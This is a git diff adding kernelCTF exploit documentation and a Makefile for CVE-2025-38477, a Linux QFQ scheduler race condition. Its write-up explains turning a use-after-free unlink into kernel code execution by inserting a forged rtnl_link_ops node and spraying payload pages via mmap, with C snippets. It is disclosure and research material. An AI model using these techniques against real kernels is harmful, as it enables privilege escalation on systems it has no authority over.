google · n132 · Oct 21, 2025 · Oct 21, 2025 · Oct 21, 2025 · Oct 21, 2025
diff --git a/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/exploit.md
diff --git a/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/novel-techniques.md
@@ -0,0 +1,265 @@
+From UAF-Unlink to ACE: LL_ATK and NPerm
+===============
+
+By combining academic race-condition techniques, we reliably hit the bug and
+obtain a use-after-free (UAF) on struct `qfq_aggregate`, which is in the
+kmalloc-128 slab:
+
+```c
+struct qfq_aggregate {
+	struct hlist_node          next;                 /*     0  0x10 */
+	u64                        S;                    /*  0x10   0x8 */
+	u64                        F;                    /*  0x18   0x8 */
+	struct qfq_group *         grp;                  /*  0x20   0x8 */
+	u32                        class_weight;         /*  0x28   0x4 */
+	int                        lmax;                 /*  0x2c   0x4 */
+	u32                        inv_w;                /*  0x30   0x4 */
+	u32                        budgetmax;            /*  0x34   0x4 */
+	u32                        initial_budget;       /*  0x38   0x4 */
+	u32                        budget;               /*  0x3c   0x4 */
+	/* --- cacheline 1 boundary (64 bytes) --- */
+	int                        num_classes;          /*  0x40   0x4 */
+
+	/* XXX 4 bytes hole, try to pack */
+
+	struct list_head           active;               /*  0x48  0x10 */
+	struct hlist_node          nonfull_next;         /*  0x58  0x10 */
+
+	/* size: 104, cachelines: 2, members: 13 */
+	/* sum members: 100, holes: 1, sum holes: 4 */
+	/* last cacheline: 40 bytes */
+};
+```
+
+With an agg pointer referencing a freed object, classic strategies include
+same-cache refill (kmalloc-128) or cross-cache exploitation. These are too heavy
+if we are gonna try several thousands times and only confirm the race once we
+build a UAF-read (e.g., by refilling with a readable struct). To win KernelCTF,
+we design a much lighter path that starts from a UAF-free with an unlink and
+requires only a KASLR base leak to reach arbitrary code execution. This combines
+two novel techniques: `LL_ATK` and `NPerm`.
+
+## UAF-Unlink
+
+Given an agg pointing to freed-and-refilled object, we can free the refilled
+object and trigger the unlink in `qfq_destroy_agg`:
+
+
+```c
+static void qfq_destroy_agg(struct qfq_sched *q, struct qfq_aggregate *agg)
+{
+	hlist_del_init(&agg->nonfull_next);
+	q->wsum -= agg->class_weight;
+	if (q->wsum != 0)
+		q->iwsum = ONE_FP / q->wsum;
+
+	if (q->in_serv_agg == agg)
+		q->in_serv_agg = qfq_choose_next_agg(q);
+	kfree(agg);
+}
+```
+
+The unlink action (`hlist_del_init(&agg->nonfull_next)`) provides an
+arbitrary-address unlink primitive:
+
+```c
+static inline void __hlist_del(struct hlist_node *n)
+{
+	struct hlist_node *next = n->next;
+	struct hlist_node **pprev = n->pprev;
+
+	WRITE_ONCE(*pprev, next);
+	if (next)
+		WRITE_ONCE(next->pprev, pprev);
+}
+```
+
+Arbitrary-Address Unlink isn’t common in kernel exploits, but we show it’s
+sufficient for Arbitrary-Code-Execution(ACE) when paired with our techniques.
+
+Arbitrary-Address-Unlink on a kernel heap object (agg object for CVE-2025-38477)
+means we can trigger the unlink option (e.g., `hlist_del_init`) and control its
+parameter (e.g. agg->nonfull_next). With a UAF, this is straightforward:
+
+- UAF to have a pointer pointing to a free-ed kernel heap object
+- Refill the object with payload data (e.g. set qfq_aggregate->nonfull_next)
+- UAF-Free the pointer to trigger unlink
+- Unlink writes 8 bytes to an arbitrary address
+
+
+So, Arbitrary-Address Unlink gives us an 8-byte arbitrary write. It’s not
+arbitrary-length and might seem weak, and we may need a heap leak primitive.
+
+In the following three sections we combine two novel techniques to gain ACE from
+an arbitary UAF-Unlink without additional address leaking. There are two key
+questions:
+- Where to write (solved by `LL_ATK`)
+- What to write (solved by `NPerm`)
+
+## UAF Unlink Attack Targeting Linked Lists: LL_ATK
+
+
+Idea. While reproducing CVE-2023-4623, I designed `LL_ATK` to resolve the “where
+to write” problem in UAF-unlink exploits. The key is to treat arbitrary-address
+unlink as a way to link an attacker-controlled (refilled) fake node into any
+existing linked list. By writing the address of a crafted fake node into a valid
+list, we later make legitimate code iterate that list and invoke function
+pointers embedded in our fake node to archive code execution.
+
+
+Example. In our exploit, we splice a fake node into the kernel’s `rtnl_link_ops`
+list. If the fake node’s name field and layout are set properly, the kernel 's
+traversal over rtnl_link_ops reaches our node and calls its function pointers.
+Crucially, this path does not require a heap address leak.
+
+```c
+struct rtnl_link_ops {
+	struct list_head           list;                 /*     0  0x10 */
+	const char  *              kind;                 /*  0x10   0x8 */
+	size_t                     priv_size;            /*  0x18   0x8 */
+	struct net_device *        (*alloc)(struct nlattr * *, const char  *, unsigned char, unsigned int, unsigned int); /*  0x20   0x8 */
+	void                       (*setup)(struct net_device *); /*  0x28   0x8 */
+	bool                       netns_refund;         /*  0x30   0x1 */
+
+	/* XXX 3 bytes hole, try to pack */
+
+	unsigned int               maxtype;              /*  0x34   0x4 */
+	const struct nla_policy  * policy;               /*  0x38   0x8 */
+	/* --- cacheline 1 boundary (64 bytes) --- */
+	int                        (*validate)(struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /*  0x40   0x8 */
+	int                        (*newlink)(struct net *, struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /*  0x48   0x8 */
+	int                        (*changelink)(struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /*  0x50   0x8 */
+	void                       (*dellink)(struct net_device *, struct list_head *); /*  0x58   0x8 */
+	size_t                     (*get_size)(const struct net_device  *); /*  0x60   0x8 */
+	int                        (*fill_info)(struct sk_buff *, const struct net_device  *); /*  0x68   0x8 */
+	size_t                     (*get_xstats_size)(const struct net_device  *); /*  0x70   0x8 */
+	int                        (*fill_xstats)(struct sk_buff *, const struct net_device  *); /*  0x78   0x8 */
+	/* --- cacheline 2 boundary (128 bytes) --- */
+	unsigned int               (*get_num_tx_queues)(void); /*  0x80   0x8 */
+	unsigned int               (*get_num_rx_queues)(void); /*  0x88   0x8 */
+	unsigned int               slave_maxtype;        /*  0x90   0x4 */
+
+	/* XXX 4 bytes hole, try to pack */
+
+	const struct nla_policy  * slave_policy;         /*  0x98   0x8 */
+	int                        (*slave_changelink)(struct net_device *, struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /*  0xa0   0x8 */
+	size_t                     (*get_slave_size)(const struct net_device  *, const struct net_device  *); /*  0xa8   0x8 */
+	int                        (*fill_slave_info)(struct sk_buff *, const struct net_device  *, const struct net_device  *); /*  0xb0   0x8 */
+	struct net *               (*get_link_net)(const struct net_device  *); /*  0xb8   0x8 */
+	/* --- cacheline 3 boundary (192 bytes) --- */
+	size_t                     (*get_linkxstats_size)(const struct net_device  *, int); /*  0xc0   0x8 */
+	int                        (*fill_linkxstats)(struct sk_buff *, const struct net_device  *, int *, int); /*  0xc8   0x8 */
+
+	/* size: 208, cachelines: 4, members: 26 */
+	/* sum members: 201, holes: 2, sum holes: 7 */
+	/* last cacheline: 16 bytes */
+};
+```
+
+`rtnl_link_ops` holds the callback table for each rtnetlink “link type” (e.g.,
+ipvlan). When userspace asks the kernel to create/modify/delete a rtnetlink
+device (via `RTM_NEWLINK`, `RTM_DELLINK`, etc.), the kernel scans the global
+linked list of registered `rtnl_link_ops` and selects the entry whose `kind`
+matches the user-provided type (e.g., "ipvlan"). If a UAF-unlink primitive lets
+us splice a forged `rtnl_link_ops` node into that list (with a correctly
+targeted `kind`). The subsequent rtnetlink operations will dispatch into
+attacker-controlled function pointers, turning the UAF-unlink into arbitrary
+code execution.
+
+
+`LL_ATK` is not only limited on `rtnl_link_ops` but a strategy of using
+UAF-Unlink. `LL_ATK` is a exploitation skill transforms UAF-Unlink to
+fake node insertion and then Arbitrary-Code-Execution. Considering
+the large use of linked lists, it can be used on lots of UAFs to make
+exploitation easier. (e.g., CVE-2023-4623, where I first designed it). It solves
+the problem of "where to write".
+
+## Leave Payload next to Kernel Resource: `NPerm`
+
+> Note: This is not an exploitation bug per se; we’ve reported it to the kernel
+> hardening team and a patch discussion is ongoing.
+
+In the `LL_ATK` setting, “what to write” is really “where to place the fake
+node.” As we mentioned in previous section, `LL_ATK` doesn't require any heap
+leak but only KASLR (Kernel Base) leak (it's not hard because of prefetch attack
+currently). `NPerm` solved the problem to "leave our payload somewhere based on
+KASLR(Kernel Base) to avoid additional leak".
+
+
+`NPerm` exploits a long-standing (decades-old) kernel design issue. We (@n132
+and @kyle) identified it in Spring 2025 and reported it to the kernel security
+team. Some maintainers did not consider it a security vulnerability and
+suggested submitting a hardening patch instead. That patch has not yet landed,
+so the issue remains exploitable (e.g., in KernelCTF). We also noticed that
+@XuaizaYa shows they independently described the same behavior in a [recent
+write-up][5], without pinpointing the root cause.
+
+> From our original email to kernel security team:
+> I am writing to bring to your attention some security vulnerabilities
+> I have discovered. These vulnerabilities allow users to allocate pages
+> mapped to kernel image areas, which would make kernel exploitation
+> easier, considering side-channel attacks.
+>
+> There are mainly 4 regions not removed from kernel image mapping after free:
+> - [rodata_resource.end, data_resource.start]
+> - [__init_begin, __init_end]
+> - [__smp_locks, __smp_locks_end]
+> - [_brk_end, hpage_align(__end_of_kernel_reserve)]
+> User space processes can use mmap to get pages in these areas and
+> leave their ROP chain on these pages so they can pivot the stack to
+> these areas with leaked kernel text base (via side-channel attacks).
+
+The root cause of the `NPerm`-vulnerability is that kernel release some pages
+used during early boot stage but it didn't "UNMAP" these pages on kernel
+resource areas. Therefore, if we get these pages back from memory and we can
+still visit them through their "MAPPED" address on kernel resource.
+
+
+It's super easy to use as we shown on the exploitation script:
+```c
+#define PAYLOAD_SPRAY_PAGES 0x10
+#define PAGE_SIZE 0x1000
+#define TOTAL_ALLOCATION (PAGE_SIZE * PAYLOAD_SPRAY_PAGES)
+
+void nperm(){
+    // Drain memory to increase chance of getting pages from the target regions.
+    pgvAdd(1, 9, 0x610);
+    for(int i = 0; i < PAYLOAD_SPRAY_PAGES; i++){
+        // PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS
+        void* addr = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+        if(addr == MAP_FAILED)
+            break;
+        memcpy(addr, payload, sizeof(payload)); // Spray payload
+    }
+    pgvDel(1); // Release the memory
+}
+```
+
+We use `pgv` allocation (not necessary but make it faster) to drain the memory
+and then spray our payload by `mmap`. Then we can find our payload on the
+following 4 regions:
+
+- [rodata_resource.end, data_resource.start]
+- [__init_begin, __init_end]
+- [__smp_locks, __smp_locks_end]
+- [_brk_end, hpage_align(__end_of_kernel_reserve)]
+
+
+`NPerm` enables us to load our payload on a known address only with KASLR
+(Kernel Base) leak, which solves "What to write" problem.
+
+
+## LL_ATK × NPerm: From UAF-Unlink to Code Execution
+
+
+Combining `LL_ATK` and `NPerm` dramatically simplifies exploitation. In our
+case, once we had a `UAF-Unlink` primitive, the final exploit core (sans
+comments) fit in ~16 lines. The two techniques are independent and reusable:
+`LL_ATK` inserts a fake node into a targeted kernel list; `NPerm` lands the fake
+node next to kernel resource area so we don't need additional kernel heap leak.
+
+Summary: Together, `LL_ATK` + `NPerm` form a generic, practical pathway to
+transform a UAF-Unlink into reliable arbitrary code execution.
+
+
+[5]: https://blog.xmcve.com/2025/09/22/WMCTF2025-Writeup/#title-5
diff --git a/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-38477_cos/docs/vulnerability.md
@@ -0,0 +1,32 @@
+# Vulnerability
+
+CVE-2025-38477 is a race condition vulnerability in the Linux kernel.
+
+It occurs when 'agg' is modified in `qfq_change_agg` (called during
+`qfq_enqueue`) while other threads access it concurrently. Calling different
+functions concurrently build different primitives. For example, `qfq_dump_class`
+may trigger a NULL dereference, and `qfq_delete_class` may cause a
+use-after-free.
+
+Easy to trigger PoC: https://lore.kernel.org/all/aGIAbGB1VAX-M8LQ@xps/
+
+## Requirements
+- **Capabilities**: `CAP_NET_ADMIN` is required.
+- **Kernel configuration**: `CONFIG_NET_SCHED` and `CONFIG_NET_SCH_QFQ` must be enabled.
+- **User namespaces**: Required to obtain `CAP_NET_ADMIN` if not already available to the user.
+
+## Introduction
+- **Commit**: [462dbc9101ac](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=462dbc9101ac)
+- **Description**: This commit introduced the "Quick Fair Queueing Plus Scheduler" (QFQ+) to the kernel in Linux 3.0-rc1.
+
+## Fix
+- **Commit**: [5e28d5a3f774](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5e28d5a3f774)
+
+## Affected Versions
+- Linux 3.0-rc1 to 6.16-rc6
+
+## Subsystem
+- Net scheduler
+
+## Root Cause
+- Race condition
diff --git a/pocs/linux/kernelctf/CVE-2025-38477_cos/exploit/cos-109-17800.519.32/Makefile b/pocs/linux/kernelctf/CVE-2025-38477_cos/exploit/cos-109-17800.519.32/Makefile
@@ -0,0 +1,54 @@
+# Makefile for CVE-2025-38477 exploit
+
+CC = gcc
+CFLAGS = -static -w
+DBGFLAGS = -g
+TARGET = exploit
+SOURCE = exploit.c
+
+# libx configuration - expects libx to be in ./libx directory
+LIBX_DIR = ./libx
+LIBX_LIB = $(LIBX_DIR)/libx.a
+LIBX_INCLUDE = $(LIBX_DIR)
+
+# Directly link the local static library to avoid conflicts with system libx
+INCLUDES = -I$(LIBX_INCLUDE)
+
+.PHONY: all clean check-libx libx
+
+all: $(LIBX_LIB) $(TARGET)
+
+# Check if libx directory exists
+check-libx:
+	@if [ ! -d "$(LIBX_DIR)" ]; then \
+		echo "Error: libx directory not found at $(LIBX_DIR)!"; \
+		echo "Please ensure libx is present in the current directory"; \
+		exit 1; \
+	fi
+
+# Build libx from local source
+$(LIBX_LIB): check-libx
+	@echo "Building libx..."
+	@$(MAKE) -C $(LIBX_DIR)
+	@echo "libx is ready!"
+
+# Convenience target to just build libx
+libx: $(LIBX_LIB)
+
+$(TARGET): $(SOURCE) $(LIBX_LIB)
+	$(CC) $(CFLAGS) $(INCLUDES) $(SOURCE) -o $(TARGET) $(LIBX_LIB)
+
+
+# Debug build expected by CI workflow
+.PHONY: exploit_debug
+exploit_debug: $(SOURCE) $(LIBX_LIB)
+	$(CC) $(filter-out -s,$(CFLAGS)) $(DBGFLAGS) $(INCLUDES) \
+		$(SOURCE) -o exploit_debug $(LIBX_LIB)
+
+clean:
+	rm -f $(TARGET)
+	rm -f exploit_debug
+	@if [ -d "$(LIBX_DIR)" ]; then \
+		echo "Cleaning libx..."; \
+		$(MAKE) -C $(LIBX_DIR) clean 2>/dev/null || true; \
+	fi
diff --git a/pocs/linux/kernelctf/CVE-2025-38477_cos/exploit/cos-109-17800.519.32/exploit b/pocs/linux/kernelctf/CVE-2025-38477_cos/exploit/cos-109-17800.519.32/exploit